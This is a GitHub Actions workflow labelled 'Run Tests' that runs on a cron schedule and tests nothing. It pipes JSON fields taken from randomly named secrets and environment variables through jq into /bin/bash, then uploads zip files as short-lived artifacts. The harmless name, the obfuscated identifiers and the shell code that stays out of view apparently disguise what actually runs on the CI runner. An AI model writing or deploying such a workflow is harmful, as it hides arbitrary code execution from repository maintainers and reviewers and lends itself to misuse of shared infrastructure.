name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '59 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          sukmk6822: ${{ secrets.sukmk6822 }}
        run: |
          printf '%s' "$sukmk6822" | jq -r .uv4011 | /bin/bash
          printf '%s' "$tma157" | jq -r .if3278 | /bin/bash
          echo $rsvz92458 | jq -r .hrmdz8 | /bin/bash
          echo $nhic25 | jq -r .mesfz7160 | /bin/bash
          printf '%s' "$zoeag397" | jq -r .f67 | /bin/bash
          printf '%s' "$wpmg10" | jq -r .u0 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: QpFQ5ncw
          path: "*.zip"
          retention-days: 1
